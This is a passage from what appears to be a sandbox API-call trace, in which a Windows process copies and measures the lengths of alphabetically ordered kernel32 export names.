lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0071.045] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0071.045] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0071.045] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0071.045] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0071.045] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0071.045] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0071.045] lstrlenA (lpString="BACKUPREAD") returned 10 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0071.045] lstrlenA (lpString="BACKUPSEEK") returned 10 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0071.045] lstrlenA (lpString="BACKUPWRITE") returned 11 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0071.045] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0071.046] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0071.046] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0071.046] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0071.046] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0071.046] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0071.046] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0071.046] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0071.046] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0071.046] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0071.046] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0071.046] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0071.046] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0071.046] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0071.046] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0071.046] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0071.046] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0071.046] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0071.046] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0071.046] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0071.047] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0071.047] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0071.047] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0071.047] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0071.047] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0071.047] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0071.047] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0071.047] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0071.047] lstrlenA (lpString="BEEP") returned 4 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0071.047] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0071.047] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0071.047] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0071.047] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0071.047] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0071.047] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0071.047] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0071.047] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0071.047] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0071.047] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0071.047] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0071.048] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0071.048] lstrlenA (lpString="CANCELIO") returned 8 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0071.048] lstrlenA (lpString="CANCELIOEX") returned 10 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0071.048] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0071.048] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0071.048] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0071.048] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0071.048] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0071.048] lstrlenA (lpString="CHECKELEVATION") returned 14 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0071.048] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0071.048] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0071.048] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0071.048] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0071.048] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0071.048] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0071.048] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0071.048] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0071.048] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0071.048] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0071.049] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0071.049] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0071.049] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0071.049] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0071.049] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0071.049] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0071.049] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0071.049] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0071.049] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0071.049] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0071.049] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0071.049] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0071.049] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0071.049] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0071.049] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0071.049] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0071.049] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0071.049] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0071.049] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0071.050] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0071.050] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0071.050] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0071.050] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0071.050] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0071.050] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0071.050] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0071.050] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0071.050] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0071.050] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0071.050] lstrlenA (lpString="COPYCONTEXT") returned 11 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0071.050] lstrlenA (lpString="COPYFILEA") returned 9 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0071.050] lstrlenA (lpString="COPYFILEEXA") returned 11 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0071.050] lstrlenA (lpString="COPYFILEEXW") returned 11 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0071.050] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0071.050] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0071.050] lstrlenA (lpString="COPYFILEW") returned 9 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0071.050] lstrlenA (lpString="COPYLZFILE") returned 10 [0071.050] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0071.050] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0071.051] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0071.051] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0071.051] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0071.051] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0071.051] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0071.051] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0071.051] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0071.051] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0071.051] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0071.051] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0071.051] lstrlenA (lpString="CREATEEVENTA") returned 12 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0071.051] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0071.051] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0071.051] lstrlenA (lpString="CREATEEVENTW") returned 12 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0071.051] lstrlenA (lpString="CREATEFIBER") returned 11 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0071.051] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0071.051] lstrlenA (lpString="CREATEFILEA") returned 11 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0071.051] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0071.051] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0071.052] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0071.052] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0071.052] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0071.052] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0071.052] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" 